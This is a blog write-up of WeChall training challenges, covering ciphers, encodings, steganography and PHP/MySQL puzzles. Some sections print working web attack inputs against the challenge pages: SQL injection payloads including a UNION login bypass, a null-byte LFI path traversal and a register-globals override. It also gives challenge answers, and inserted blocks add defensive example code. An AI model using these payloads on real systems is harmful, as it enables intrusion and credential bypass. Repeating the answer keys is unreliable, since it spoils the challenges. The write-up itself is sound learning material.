Wechall WriteUp

Qiqi's Blog   2018-01-12   7600 words


I'm a complete beginner who only got started recently. I stumbled across this foreign site and found its challenges interesting; you can learn a lot from them. This writeup will be updated continuously.

Prime Factory

Straight to Python:

import math

results = []

def sushu(num):
    """Return True if num is prime (trial division up to sqrt(num))."""
    if num < 2:
        return False
    for i in range(2, math.isqrt(num) + 1):
        if num % i == 0:
            return False
    return True

def digit_sum(num):
    """Sum the decimal digits of num (works for numbers up to 7 digits)."""
    total = 0
    divide = 1000000
    while divide > 0:
        total += num // divide
        num %= divide
        divide //= 10
    return total

# Find the first two primes above 1,000,000 whose digit sum is also prime.
cnt = 0
for i in range(1000000, 2000000):
    print("trying", i)
    if sushu(i) and sushu(digit_sum(i)):
        results.append(i)
        cnt += 1
    if cnt == 2:
        break

print(str(results[0]) + str(results[1]))

Training: Get Sourced

View the page source.

Scroll to the very bottom; there is a comment: <!-- You are looking for this password: html_sourcecode -->

Training: Stegano I

Open the image in 0xED and look at the hex dump.

Crypto - Caesar I

Again, just run it through Python and see which line looks like the answer:

# coding: utf-8

# Try all 26 shifts; uppercase letters are rotated, everything else is passed through.
s = input('input the ciphertext: ')
for i in range(26):
    flag = ''
    for j in s:
        if 'A' <= j <= 'Z':
            flag += chr((ord(j) - ord('A') + i) % 26 + ord('A'))
        else:
            flag += j
    print(flag)

THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG OF CAESAR AND YOUR UNIQUE SOLUTION IS LESIAGFMGLLG

Training: WWW-Robots

Not much to say: the robots protocol, i.e. the Robots Exclusion Standard (look it up if you are not familiar with it).

Go straight to http://www.wechall.net/robots.txt

which gives the next URL: http://www.wechall.net/challenge/training/www/robots/T0PS3CR3T

Training: ASCII

This one is too straightforward: just convert the ASCII codes to characters. The solution is: sshcbslrspcf

Encodings - URL

An equally straightforward one: URL encoding and Unicode encoding.

Decoding gives

Yippeh! Your URL is challenge/training/encodings/url/saw_lotion.php?p=rosmidrpmpgl&cid=52#password=fibre_optics Very well done!

Or with Python:

>>> import urllib
>>> url = '%59%69%70%70%65%68%21%20%59%6F%75%72%20%55%52%4C%20%69%73%20%63%68%61%6C%6C%65%6E%67%65%2F%74%72%61%69%6E%69%6E%67%2F%65%6E%63%6F%64%69%6E%67%73%2F%75%72%6C%2F%73%61%77%5F%6C%6F%74%69%6F%6E%2E%70%68%70%3F%70%3D%73%68%67%73%61%6D%6F%67%6D%73%6C%72%26%63%69%64%3D%35%32%23%70%61%73%73%77%6F%72%64%3D%66%69%62%72%65%5F%6F%70%74%69%63%73%20%56%65%72%79%20%77%65%6C%6C%20%64%6F%6E%65%21'
>>> print urllib.unquote(url)
Yippeh! Your URL is challenge/training/encodings/url/saw_lotion.php?p=shgsamogmslr&cid=52#password=fibre_optics Very well done!

Training: Encodings I

ASCII is a 7-bit encoding; it is normally stored in 8 bits with the top bit always 0.

The length of this challenge's input is a multiple of 7, so split it into groups of 7 bits and decode each group.

This yields: This text is 7-bit encoded ascii. Your password is easystarter.
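As an added example (not from the original post), a decoder for the 7-bit grouping described above, with a length check and a small heuristic, following the post's reasoning, for telling 7-bit from 8-bit packing; the sample bit strings are constructed here by packing a sentence and are not the challenge's input:

```python
def decode_7bit(bits):
    """Decode a string of '0'/'1' characters, 7 bits per ASCII character."""
    bits = "".join(bits.split())  # tolerate whitespace between groups
    if len(bits) % 7 != 0:
        raise ValueError(f"bit string length {len(bits)} is not a multiple of 7")
    if set(bits) - {"0", "1"}:
        raise ValueError("input contains characters other than 0 and 1")
    return "".join(chr(int(bits[i:i + 7], 2)) for i in range(0, len(bits), 7))

def encode_7bit(text):
    """Inverse of decode_7bit: pack ASCII text at 7 bits per character."""
    if any(ord(c) > 127 for c in text):
        raise ValueError("only ASCII text can be 7-bit encoded")
    return "".join(format(ord(c), "07b") for c in text)

def guess_width(bits):
    """Heuristic: whichever group size (7 or 8) divides the length and yields
    only printable ASCII is the likely encoding width; None if neither does."""
    bits = "".join(bits.split())
    for width in (7, 8):
        if len(bits) % width:
            continue
        codes = [int(bits[i:i + width], 2) for i in range(0, len(bits), width)]
        if all(32 <= c < 127 for c in codes):
            return width
    return None

# Constructed samples (not the challenge's input): the same sentence packed at
# 7 and at 8 bits per character.
SAMPLE_TEXT = "This text is 7-bit encoded ascii."
SAMPLE_BITS = encode_7bit(SAMPLE_TEXT)
SAMPLE_BITS_8 = "".join(format(ord(c), "08b") for c in SAMPLE_TEXT)

if __name__ == "__main__":
    print(guess_width(SAMPLE_BITS), decode_7bit(SAMPLE_BITS))
```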

Guesswork

This one is literally just guessing the password, which left me speechless.

I first guessed wechall, which was wrong, then tried a few other things at random. Judging from the error messages, wechall was still the closest, but I really could not guess it, so I read someone else's writeup and found the password is wechallbot; bot is wechall's role... I have no words.

No Escape

Look at the key part of the code:

function noesc_voteup($who)
{
    if ( (stripos($who, 'id') !== false) || (strpos($who, '/') !== false) ) {
        echo GWF_HTML::error('No Escape', 'Please do not mess with the id. It would break the challenge for others', false);
        return;
    }

    $db = noesc_db();
    $who = GDO::escape($who);
    $query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
    if (false !== $db->queryWrite($query)) {
        echo GWF_HTML::message('No Escape', 'Vote counted for '.GWF_HTML::display($who), false);
    }

    noesc_stop100();
}

The key statement:

$query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";

This is a simple SQL injection: close the backtick, then add a # or --+ comment. Note that # has to be URL-encoded (%23). The final URL is:

http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111--+
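As an added example (not the challenge's PHP), the Python below mirrors the pattern above: the denylist plus quote escaping in build_vote_query_vulnerable leaves the backtick untouched, while build_vote_query_hardened checks the column name against an allowlist; escape_string, ALLOWED_COLUMNS and the helper names are assumptions for the illustration.

```python
import re

# Assumed set of vote columns for the illustration (the real table layout is not on the page).
ALLOWED_COLUMNS = {"bill", "steve"}

def escape_string(s):
    """Mimic a quote-escaping routine such as GDO::escape: like mysql_real_escape_string,
    it escapes quotes and backslashes but leaves backticks untouched."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def build_vote_query_vulnerable(who):
    """The challenge's pattern: a denylist on 'id' and '/', then an escaped value
    spliced into an identifier position, where quote escaping does not help."""
    if "id" in who.lower() or "/" in who:
        raise ValueError("Please do not mess with the id")
    who = escape_string(who)
    return f"UPDATE noescvotes SET `{who}`=`{who}`+1 WHERE id=1"

def build_vote_query_hardened(who):
    """Identifiers cannot be bound as query parameters, so validate them
    against an allowlist instead of escaping them."""
    if who not in ALLOWED_COLUMNS:
        raise ValueError(f"unknown vote target: {who!r}")
    return f"UPDATE noescvotes SET `{who}`=`{who}`+1 WHERE id=1"

def where_clause_survives(query):
    """Review helper: does 'WHERE id=1' still take effect once a -- or # comment
    has swallowed the rest of the statement?"""
    effective = re.split(r"--|#", query, maxsplit=1)[0]
    return "WHERE id=1" in effective

# The post's payload after URL decoding (the trailing '+' is a space, which
# MySQL requires after -- for it to start a comment).
PAYLOAD = "bill`=111-- "

if __name__ == "__main__":
    q = build_vote_query_vulnerable(PAYLOAD)
    print(q, "-> WHERE survives:", where_clause_survives(q))
```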

Training: Regex

Level 1

Match an empty string; this teaches the two anchors for the start and end of a string: /^$/

Level 2

Match "wechall": /^wechall$/

Level 3

Match a file name that is wechall or wechall4 with a .jpg/.gif/.tiff/.bmp/.png extension: /^wechall4?\.(?:jpg|gif|tiff|bmp|png)$/

Level 4

Capture the file name: /^(wechall4?)\.(?:jpg|gif|tiff|bmp|png)$/

Training: PHP LFI

This is a PHP file inclusion challenge (an LFI vulnerability).

$filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
include $filename;

The challenge already hands you the key information, and the file parameter is not filtered at all.

Go straight to http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../solution.php

The error message is:

PHP Warning(2): include(pages/../solution.php.html): failed to open stream: No such file or directory in www/challenge/training/php/lfi/up/index.php(54) : eval()'d code line 1

It says the file ../solution.php.html cannot be found,

so we use a null byte (%00) to truncate the path and drop the trailing .html:

PHP Warning(2): include(pages/../solution.php): failed to open stream: No such file or directory in www/challenge/training/php/lfi/up/index.php(54) : eval()'d code line 1

It still says ../solution.php cannot be found,

so add one more directory level and visit http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

PHP 0817

This one doesn't really count as file inclusion.

In PHP, when a switch compares against numeric cases, it converts the parameter to an int for the comparison.

So we just set the parameter which to the value solution.

Training: Crypto - Transposition I

You can see this one at a glance: every pair of characters has its order swapped.

Training: Crypto - Substitution I

A substitution cipher.

Just use an online tool, quipqiup.

Training: MySQL I

The simplest SQL injection: close the quote and comment out the rest, i.e. set Username to admin'#.

Training: MySQL II

Look at the source:

$db = auth2_db();

$password = md5($password);

$query = "SELECT * FROM users WHERE username='$username'";

if (false === ($result = $db->queryFirst($query))) {
    echo GWF_HTML::error('Auth2', $chall->lang('err_unknown'), false);
    return false;
}

#############################
### This is the new check ###
if ($result['password'] !== $password) {
    echo GWF_HTML::error('Auth2', $chall->lang('err_password'), false);
    return false;
} #  End of the new code  ###
#############################

It looks up the row by Username, then compares the stored password with the md5 of the supplied password.

So the approach is clear: set Username to ' union select 1, 'admin', 'c4ca4238a0b923820dcc509a6f75849b'# and Password to 1,

since md5(1) == c4ca4238a0b923820dcc509a6f75849b.

This bypasses the check.
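As an added example (not the challenge's code), this rebuilds the login check above against an in-memory SQLite table with a constructed user and places a parameterised version beside it; the schema, the stored password and the function names are assumptions. SQLite has no # comment, so the payload uses -- instead.

```python
import hashlib
import sqlite3

def make_db():
    """Constructed users table for the example (not the challenge's real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)",
               (hashlib.md5(b"correct horse").hexdigest(),))
    return db

def check_hash(row, password):
    """The challenge's comparison: stored hash against md5(password). md5 is kept
    only to mirror the challenge; a real login would use a password hash like bcrypt."""
    if row is None:
        return False
    return row[2] == hashlib.md5(password.encode()).hexdigest()

def login_vulnerable(db, username, password):
    """Mirror of the challenge: username is spliced into the query, so a UNION can
    supply a row whose hash the attacker already knows."""
    query = f"SELECT * FROM users WHERE username='{username}'"
    return check_hash(db.execute(query).fetchone(), password)

def login_hardened(db, username, password):
    """Parameterised query: the username is bound as data and can never change
    the shape of the statement."""
    row = db.execute("SELECT * FROM users WHERE username=?", (username,)).fetchone()
    return check_hash(row, password)

# The post's payload, with -- in place of # because SQLite lacks # comments.
PAYLOAD = "' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "1"))
    print("hardened:  ", login_hardened(db, PAYLOAD, "1"))
```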

Training: Register Globals

Again, look at the source:

if (isset($login))
{
        echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
        if (strtolower($login[0]) === 'admin') {
                $chall->onChallengeSolved(GWF_Session::getUserID());
        }
}

Note that all we need is $login[0] == admin, so just append ?login[0]=admin to the URL.

Training: Math Pyramid

This one is a real trap; the author deliberately shows sqrt to mislead you. It is actually very simple: a^3/18^.5

Training: LSB

Straight to the trusty Stegsolve; step through the channels and you will find the answer.

Stegano Attachment

The link opens an image. Whatever it is, first throw it at binwalk: binwalk attachment.jpg

This finds:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
20230         0x4F06          Zip archive data, at least v2.0 to extract, compressed size: 12, uncompressed size: 12, name: solution.txt
20342         0x4F76          End of Zip archive

Starting at offset 20230 there is a hidden zip archive.

Carve it out: dd if=attachment.jpg of=solution.zip skip=20230 bs=1

Open the archive; it contains a file named solution.txt, and inside is the answer.

Training: Crypto - Caesar II

0B 33 33 28 20 2E 33 26 70 20 3D 33 39 20 37 33
30 3A 29 28 20 33 32 29 20 31 33 36 29 20 27 2C
25 30 30 29 32 2B 29 20 2D 32 20 3D 33 39 36 20
2E 33 39 36 32 29 3D 72 20 18 2C 2D 37 20 33 32
29 20 3B 25 37 20 2A 25 2D 36 30 3D 20 29 25 37
3D 20 38 33 20 27 36 25 27 2F 72 20 1B 25 37 32
6B 38 20 2D 38 03 20 75 76 7C 20 2F 29 3D 37 20
2D 37 20 25 20 35 39 2D 38 29 20 37 31 25 30 30
20 2F 29 3D 37 34 25 27 29 70 20 37 33 20 2D 38
20 37 2C 33 39 30 28 32 6B 38 20 2C 25 3A 29 20
38 25 2F 29 32 20 3D 33 39 20 38 33 33 20 30 33
32 2B 20 38 33 20 28 29 27 36 3D 34 38 20 38 2C
2D 37 20 31 29 37 37 25 2B 29 72 20 1B 29 30 30
20 28 33 32 29 70 20 3D 33 39 36 20 37 33 30 39
38 2D 33 32 20 2D 37 20 26 36 33 2B 36 36 32 26
36 2A 2A 28 72

Convert the hex to characters, then decrypt by shifting within the ASCII range and pick the result that looks like the answer:

Good\job,\you\solved\one\more\challenge\in\your\journey.\This\one\was\fairly\easy\to\crack.\Wasn't\it?\128\keys\is\a\quite\small\keyspace,\so\it\shouldn't\have\taken\you\too\long\to\decrypt\this\message.\Well\done,\your\solution\is\brogrrnbrffd.
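As an added example (not from the original post), this generalises the Caesar I script earlier on the page to the full 128-character ASCII alphabet that Caesar II needs, and ranks all 128 keys by how printable and word-like the output is; the sample ciphertext is constructed here with an assumed key and is not the challenge's hex above.

```python
import string

PRINTABLE = set(string.printable)

def caesar_ascii_shift(data, key):
    """Shift every byte by key modulo 128, i.e. over the whole 7-bit ASCII range."""
    return bytes((b + key) % 128 for b in data)

def score_plaintext(text):
    """Higher is more English-looking: share of printable characters plus
    share of letters and spaces."""
    printable = sum(c in PRINTABLE for c in text) / len(text)
    wordish = sum(c.isalpha() or c == " " for c in text) / len(text)
    return printable + wordish

def brute_force_ascii_caesar(ciphertext, top=3):
    """Try all 128 keys and return the best (score, key, plaintext) triples,
    best first; 128 keys is small enough to rank every candidate."""
    candidates = []
    for key in range(128):
        text = caesar_ascii_shift(ciphertext, key).decode("ascii")
        candidates.append((score_plaintext(text), key, text))
    candidates.sort(reverse=True)
    return candidates[:top]

# Constructed sample: a message encrypted with the assumed key 68, so key 60
# (68 + 60 = 128) decrypts it. SAMPLE_HEX is in the same space-separated
# hex layout as the challenge text.
SAMPLE_PLAINTEXT = "Your solution is EXAMPLE."
SAMPLE_CIPHERTEXT = caesar_ascii_shift(SAMPLE_PLAINTEXT.encode("ascii"), 68)
SAMPLE_HEX = SAMPLE_CIPHERTEXT.hex(" ").upper()

if __name__ == "__main__":
    for score, key, text in brute_force_ascii_caesar(bytes.fromhex(SAMPLE_HEX)):
        print(f"key={key:3d} score={score:.2f} {text!r}")
```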